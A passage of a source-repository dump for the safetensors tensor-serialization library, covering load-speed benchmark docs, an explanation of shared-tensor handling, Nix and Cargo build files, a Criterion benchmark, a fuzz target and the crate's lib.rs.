33 | >>> pt_filename = hf_hub_download("gpt2", filename="pytorch_model.bin")
34 | ```
35 | 
36 | ### CPU benchmark
37 | 
38 | ```py
39 | >>> start_st = datetime.datetime.now()
40 | >>> weights = load_file(sf_filename, device="cpu")
41 | >>> load_time_st = datetime.datetime.now() - start_st
42 | >>> print(f"Loaded safetensors {load_time_st}")
43 | 
44 | >>> start_pt = datetime.datetime.now()
45 | >>> weights = torch.load(pt_filename, map_location="cpu")
46 | >>> load_time_pt = datetime.datetime.now() - start_pt
47 | >>> print(f"Loaded pytorch {load_time_pt}")
48 | 
49 | >>> print(f"on CPU, safetensors is faster than pytorch by: {load_time_pt/load_time_st:.1f} X")
50 | Loaded safetensors 0:00:00.004015
51 | Loaded pytorch 0:00:00.307460
52 | on CPU, safetensors is faster than pytorch by: 76.6 X
53 | ```
54 | 
55 | This speedup is due to the fact that this library avoids unnecessary copies by memory-mapping the file directly. It is actually possible to do this in [pure pytorch](https://gist.github.com/Narsil/3edeec2669a5e94e4707aa0f901d2282).
56 | The speedup shown here was measured on:
57 | * OS: Ubuntu 18.04.6 LTS
58 | * CPU: Intel(R) Xeon(R) CPU @ 2.00GHz
59 | 
60 | 
61 | ### GPU benchmark
62 | 
63 | ```py
64 | >>> # This is required because this feature hasn't been fully verified yet, but
65 | >>> # it's been tested on many different environments
66 | >>> os.environ["SAFETENSORS_FAST_GPU"] = "1"
67 | 
68 | >>> # Keep CUDA startup out of the measurement
69 | >>> torch.zeros((2, 2)).cuda()
70 | 
71 | >>> start_st = datetime.datetime.now()
72 | >>> weights = load_file(sf_filename, device="cuda:0")
73 | >>> load_time_st = datetime.datetime.now() - start_st
74 | >>> print(f"Loaded safetensors {load_time_st}")
75 | 
76 | >>> start_pt = datetime.datetime.now()
77 | >>> weights = torch.load(pt_filename, map_location="cuda:0")
78 | >>> load_time_pt = datetime.datetime.now() - start_pt
79 | >>> print(f"Loaded pytorch {load_time_pt}")
80 | 
81 | >>> print(f"on GPU, safetensors is faster than pytorch by: {load_time_pt/load_time_st:.1f} X")
82 | Loaded safetensors 0:00:00.165206
83 | Loaded pytorch 0:00:00.353889
84 | on GPU, safetensors is faster than pytorch by: 2.1 X
85 | ```
86 | 
87 | The speedup works because this library is able to skip unnecessary CPU allocations. It is, as far as we know, unfortunately not replicable in pure pytorch. The library works by memory-mapping the file, creating an empty tensor with pytorch, and calling `cudaMemcpy` directly to move the data onto the GPU.
88 | The speedup shown here was measured on:
89 | * OS: Ubuntu 18.04.6 LTS
90 | * GPU: Tesla T4
91 | * Driver Version: 460.32.03
92 | * CUDA Version: 11.2
93 | 
--------------------------------------------------------------------------------
/docs/source/torch_shared_tensors.mdx:
--------------------------------------------------------------------------------
1 | # Torch shared tensors
2 | 
3 | 
4 | ## TL;DR
5 | 
6 | Use the specific functions below; they should work in most cases for you.
7 | This is not without side effects, though.
8 | 
9 | ```python
10 | from safetensors.torch import load_model, save_model
11 | 
12 | save_model(model, "model.safetensors")
13 | # Instead of save_file(model.state_dict(), "model.safetensors")
14 | 
15 | load_model(model, "model.safetensors")
16 | # Instead of model.load_state_dict(load_file("model.safetensors"))
17 | ```
18 | 
19 | ## What are shared tensors?
20 | 
21 | PyTorch uses shared tensors for some computations.
22 | This is extremely useful for reducing memory usage in general.
23 | 
24 | One very classic use case: in transformers, the `embeddings` are shared with
25 | `lm_head`. By using the same matrix, the model uses fewer parameters, and gradients
26 | flow much better to the `embeddings` (which sit at the start of the model, where gradients
27 | hardly flow, whereas `lm_head` sits at the tail of the model, where gradients are
28 | plentiful; since both are the same tensor, they both benefit).
29 | 
30 | 
31 | ```python
32 | import torch
33 | from torch import nn
34 | 
35 | class Model(nn.Module):
36 |     def __init__(self):
37 |         super().__init__()
38 |         self.a = nn.Linear(100, 100)
39 |         self.b = self.a
40 | 
41 |     def forward(self, x):
42 |         return self.b(self.a(x))
43 | 
44 | 
45 | model = Model()
46 | print(model.state_dict())
47 | # odict_keys(['a.weight', 'a.bias', 'b.weight', 'b.bias'])
48 | torch.save(model.state_dict(), "model.bin")
49 | # This file is now 41k instead of ~80k: `a` and `b` are the same weight, so only 1 copy is saved on disk, with both `a` and `b` pointing to the same buffer
50 | ```
51 | 
52 | ## Why are shared tensors not saved in `safetensors`?
53 | 
54 | There are multiple reasons for that:
55 | 
56 | - *Not all frameworks support them*, for instance `tensorflow` does not.
57 |   So if someone saves shared tensors in torch, there would be no way to
58 |   load them in a similar fashion, so we could not keep the same `Dict[str, Tensor]`
59 |   API.
60 | - *It would make lazy loading very difficult.*
61 |   Lazy loading is the ability to load only some tensors, or parts of tensors, from
62 |   a given file. This is trivial to do without tensor sharing, but with tensor sharing:
63 | 
64 |   ```python
65 |   with safe_open("model.safetensors", framework="pt") as f:
66 |       a = f.get_tensor("a")
67 |       b = f.get_tensor("b")
68 |   ```
69 | 
70 |   Now it's impossible with this code to "reshare" buffers after the fact.
71 |   Once we hand out the `a` tensor, we have no way to give back the same memory when
72 |   you ask for `b`. (In this particular example we could keep track of the buffers we gave out,
73 |   but this is not the case in general, since you could do arbitrary work with `a`,
74 |   like sending it to another device before asking for `b`.)
75 | - *It can lead to much larger files than necessary*.
76 |   If you are saving a shared tensor which is only a fraction of a larger tensor,
77 |   then saving it with pytorch leads to saving the entire buffer instead of saving
78 |   just what is needed.
79 | 
80 |   ```python
81 |   a = torch.zeros((100, 100))
82 |   b = a[:1, :]
83 |   torch.save({"b": b}, "model.bin")
84 |   # File is 41k instead of the expected 400 bytes
85 |   # In practice, you could end up saving several 10GB instead of 1GB.
86 |   ```
87 | 
88 | With all those reasons mentioned, nothing here is set in stone.
89 | Shared tensors do not cause unsafety or denial-of-service potential, so this
90 | decision could be revisited if the current workarounds are not satisfactory.
91 | 
92 | ## How does it work?
93 | 
94 | The design is rather simple.
95 | We look for all shared tensors, then for all tensors
96 | covering the entire buffer (there can be multiple such tensors).
97 | That gives us multiple names which could be saved; we simply choose the first one.
98 | 
99 | During `load_model`, we load a bit like `load_state_dict` does, except
100 | we look into the model itself to check for shared buffers, and we ignore
101 | the "missing keys" which were actually covered by virtue of buffer sharing (they
102 | were properly loaded, since there was a buffer that was loaded under the hood).
103 | Every other error is raised as-is.
104 | 
105 | **Caveat**: This means we drop some keys within the file. If you check
106 | the keys saved on disk, or use `load_state_dict`, you will see some
107 | tensors as "missing". Unless we start supporting shared tensors directly in
108 | the format, there is no real way around it.
--------------------------------------------------------------------------------
/flake.lock:
--------------------------------------------------------------------------------
1 | {
2 |   "nodes": {
3 |     "nixpkgs": {
4 |       "locked": {
5 |         "lastModified": 1730531603,
6 |         "narHash": "sha256-Dqg6si5CqIzm87sp57j5nTaeBbWhHFaVyG7V6L8k3lY=",
7 |         "owner": "NixOS",
8 |         "repo": "nixpkgs",
9 |         "rev": "7ffd9ae656aec493492b44d0ddfb28e79a1ea25d",
10 |         "type": "github"
11 |       },
12 |       "original": {
13 |         "owner": "NixOS",
14 |         "ref": "nixos-unstable",
15 |         "repo": "nixpkgs",
16 |         "type": "github"
17 |       }
18 |     },
19 |     "root": {
20 |       "inputs": {
21 |         "nixpkgs": "nixpkgs"
22 |       }
23 |     }
24 |   },
25 |   "root": "root",
26 |   "version": 7
27 | }
28 | 
--------------------------------------------------------------------------------
/flake.nix:
--------------------------------------------------------------------------------
1 | {
2 |   inputs = {
3 |     nixpkgs.url = "github:NixOS/nixpkgs/nixos-unstable";
4 |   };
5 | 
6 |   outputs =
7 |     { nixpkgs, ... }:
8 |     let
9 |       forAllSystems = nixpkgs.lib.genAttrs [
10 |         "aarch64-linux"
11 |         "x86_64-linux"
12 |         "aarch64-darwin"
13 |       ];
14 |     in
15 |     {
16 |       devShells = forAllSystems (
17 |         system:
18 |         let
19 |           pkgs = nixpkgs.legacyPackages.${system};
20 |         in
21 |         {
22 |           default = pkgs.mkShell {
23 |             buildInputs = with pkgs; [
24 |               rustup
25 |               python3Packages.python
26 |               python3Packages.venvShellHook
27 |             ];
28 |             venvDir = "./.venv";
29 |             postVenvCreation = ''
30 |               unset SOURCE_DATE_EPOCH
31 |             '';
32 |             postShellHook = ''
33 |               unset SOURCE_DATE_EPOCH
34 |             '';
35 |             LD_LIBRARY_PATH = "$LD_LIBRARY_PATH:${pkgs.stdenv.cc.cc.lib}/lib:${pkgs.zlib}/lib:/run/opengl-driver/lib";
36 |           };
37 | 
38 |         }
39 |       );
40 |     };
41 | }
42 | 
--------------------------------------------------------------------------------
/safetensors/Cargo.toml:
--------------------------------------------------------------------------------
1 | [package]
2 | name = "safetensors"
3 | version = "0.5.3-dev.0"
4 | edition = "2021"
5 | rust-version = "1.74"
6 | homepage = "https://github.com/huggingface/safetensors"
7 | repository = "https://github.com/huggingface/safetensors"
8 | documentation = "https://docs.rs/safetensors/"
9 | license = "Apache-2.0"
10 | keywords = ["safetensors", "huggingface", "Tensors", "Pytorch", "Tensorflow"]
11 | readme = "./README.md"
12 | description = """
13 | Provides functions to read and write safetensors, which aim to be safer than
14 | their PyTorch counterpart.
15 | The format starts with 8 bytes holding an unsigned integer, which is the size of a JSON header;
16 | the JSON header refers to the `dtype`, the `shape` and the `data_offsets`, which are the offsets
17 | for the values in the rest of the file.
18 | """
19 | exclude = [ "rust-toolchain", "target/*", "Cargo.lock"]
20 | 
21 | 
22 | # See more keys and their definitions at https://doc.rust-lang.org/cargo/reference/manifest.html
23 | 
24 | [dependencies]
25 | hashbrown = { version = "0.15.2", features = ["serde"], optional = true }
26 | serde = { version = "1.0", default-features = false, features = ["derive"] }
27 | serde_json = { version = "1.0", default-features = false }
28 | 
29 | [dev-dependencies]
30 | criterion = "0.5"
31 | memmap2 = "0.9"
32 | proptest = "1.4"
33 | 
34 | [features]
35 | default = ["std"]
36 | std = ["serde/default", "serde_json/default"]
37 | alloc = ["serde/alloc", "serde_json/alloc", "hashbrown"]
38 | 
39 | [[bench]]
40 | name = "benchmark"
41 | harness = false
42 | 
--------------------------------------------------------------------------------
/safetensors/LICENSE:
--------------------------------------------------------------------------------
1 | ../LICENSE
--------------------------------------------------------------------------------
/safetensors/README.md:
--------------------------------------------------------------------------------
1 | ../README.md
--------------------------------------------------------------------------------
/safetensors/benches/benchmark.rs:
--------------------------------------------------------------------------------
1 | use criterion::{black_box, criterion_group, criterion_main, Criterion};
2 | use safetensors::tensor::*;
3 | use std::collections::HashMap;
4 | 
5 | // Returns sample data of size 2_MB
6 | fn get_sample_data() -> (Vec<u8>, Vec<usize>, Dtype) {
7 |     let shape = vec![1000, 500];
8 |     let dtype = Dtype::F32;
9 |     let n: usize = shape.iter().product::<usize>() * dtype.size(); // 4 bytes per F32 element
10 |     let data = vec![0; n];
11 | 
12 |     (data, shape, dtype)
13 | }
14 | 
15 | pub fn bench_serialize(c: &mut Criterion) {
16 |     let (data, shape, dtype) = get_sample_data();
17 |     let n_layers = 5;
18 | 
19 |     let mut metadata: HashMap<String, TensorView> = HashMap::new();
20 |     // 2_MB x 5 = 10_MB
21 |     for i in 0..n_layers {
22 |         let tensor = TensorView::new(dtype, shape.clone(), &data[..]).unwrap();
23 |         metadata.insert(format!("weight{i}"), tensor);
24 |     }
25 | 
26 |     c.bench_function("Serialize 10_MB", |b| {
27 |         b.iter(|| {
28 |             let _serialized = serialize(black_box(&metadata), black_box(&None));
29 |         })
30 |     });
31 | }
32 | 
33 | pub fn bench_deserialize(c: &mut Criterion) {
34 |     let (data, shape, dtype) = get_sample_data();
35 |     let n_layers = 5;
36 | 
37 |     let mut metadata: HashMap<String, TensorView> = HashMap::new();
38 |     // 2_MB x 5 = 10_MB
39 |     for i in 0..n_layers {
40 |         let tensor = TensorView::new(dtype, shape.clone(), &data[..]).unwrap();
41 |         metadata.insert(format!("weight{i}"), tensor);
42 |     }
43 | 
44 |     let out = serialize(&metadata, &None).unwrap();
45 | 
46 |     c.bench_function("Deserialize 10_MB", |b| {
47 |         b.iter(|| {
48 |             let _deserialized = SafeTensors::deserialize(black_box(&out)).unwrap();
49 |         })
50 |     });
51 | }
52 | 
53 | criterion_group!(bench_ser, bench_serialize);
54 | criterion_group!(bench_de, bench_deserialize);
55 | criterion_main!(bench_ser, bench_de);
56 | 
--------------------------------------------------------------------------------
/safetensors/fuzz/.gitignore:
--------------------------------------------------------------------------------
1 | target
2 | corpus
3 | artifacts
4 | coverage
--------------------------------------------------------------------------------
/safetensors/fuzz/Cargo.toml:
--------------------------------------------------------------------------------
1 | [package]
2 | name = "safetensors-fuzz"
3 | version = "0.0.0"
4 | publish = false
5 | edition = "2021"
6 | 
7 | [package.metadata]
8 | cargo-fuzz = true
9 | 
10 | [dependencies]
11 | libfuzzer-sys = "0.4"
12 | 
13 | [dependencies.safetensors]
14 | path = ".."
15 | 
16 | # Prevent this from interfering with workspaces
17 | [workspace]
18 | members = ["."]
19 | 
20 | [profile.release]
21 | debug = 1
22 | 
23 | [[bin]]
24 | name = "fuzz_target_1"
25 | path = "fuzz_targets/fuzz_target_1.rs"
26 | test = false
27 | doc = false
28 | 
--------------------------------------------------------------------------------
/safetensors/fuzz/fuzz_targets/fuzz_target_1.rs:
--------------------------------------------------------------------------------
1 | #![no_main]
2 | 
3 | use libfuzzer_sys::fuzz_target;
4 | use safetensors::tensor::SafeTensors;
5 | 
6 | fuzz_target!(|data: &[u8]| {
7 |     let _ = SafeTensors::deserialize(data);
8 | });
9 | 
--------------------------------------------------------------------------------
/safetensors/src/lib.rs:
--------------------------------------------------------------------------------
1 | #![deny(missing_docs)]
2 | #![doc = include_str!("../README.md")]
3 | #![cfg_attr(not(feature = "std"), no_std)]
4 | pub mod slice;
5 | pub mod tensor;
6 | /// `serialize_to_file` is only available with the `std` feature
7 | #[cfg(feature = "std")]
8 | pub use tensor::serialize_to_file;
9 | pub use tensor::{serialize, Dtype, SafeTensorError, SafeTensors, View};
10 | 
11 | #[cfg(feature = "alloc")]
12 | #[macro_use]
13 | extern crate alloc;
14 | 
15 | #[cfg(all(feature = "std", feature = "alloc"))]
16 | compile_error!("must choose either the `std` or `alloc` feature, but not both.");
17 | #[cfg(all(not(feature = "std"), not(feature = "alloc")))]
18 | compile_error!("must choose either the `std` or `alloc` feature");
19 | 
20 | /// A facade around all the types we need from the `std`, `core`, and `alloc`
21 | /// crates. This avoids elaborate import wrangling having to happen in every
22 | /// module.
23 | mod lib {
24 |     #[cfg(not(feature = "std"))]
25 |     mod no_stds {
26 |         pub use alloc::borrow::Cow;
27 |         pub use alloc::string::{String, ToString};
28 |         pub use alloc::vec::Vec;
29 |         pub use hashbrown::HashMap;
30 |     }
31 |     #[cfg(feature = "std")]
32 |     mod stds {
33 |         pub use std::borrow::Cow;
34 |         pub use std::collections::HashMap;
35 |         pub use std::string::{String, ToString};
36 |         pub use std::vec::Vec;
37 |     }
38 |     /// Choose the std or no_std exports via the feature flag
39 |     #[cfg(not(feature = "std"))]
40 |     pub use no_stds::*;
41 |     #[cfg(feature = "std")]
42 |     pub use stds::*;
43 | }
44 | 
--------------------------------------------------------------------------------